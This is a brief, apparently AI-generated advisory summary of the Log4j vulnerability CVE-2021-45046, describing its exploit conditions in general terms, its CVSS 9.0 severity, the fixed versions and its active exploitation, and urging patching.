CVE-2021-45046 is a critical vulnerability affecting Apache Log4j versions, specifically related to incomplete fixes implemented for CVE-2021-44228. This vulnerability allows attackers with control over Thread Context Map (MDC) input data to exploit certain non-default configurations. Specifically, when the logging configuration utilizes a non-default Pattern Layout with a Context Lookup or a Thread Context Map pattern, attackers can craft malicious input data that leverages a JNDI Lookup pattern. This exploitation can lead to information leaks and remote code execution in specific environments, while local code execution is possible across all environments.
The severity of this vulnerability is classified as critical, with a CVSS score of 9.0. This high score indicates significant risks to organizations, where attackers may leverage this vulnerability to gain unauthorized access to sensitive data or systems.
Organizations should prioritize patching immediately. The fix was implemented in Log4j versions 2.16.0 (Java 8) and 2.12.2 (Java 7), which remove support for message lookup patterns and disable JNDI functionality by default.
As of now, this vulnerability is actively exploited, and it has been included in the Known Exploited Vulnerabilities (KEV) catalog. The urgency for patching is underscored by the fact that numerous organizations have reported instances of exploitation. Failure to address this vulnerability can lead to severe repercussions.
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
.webp)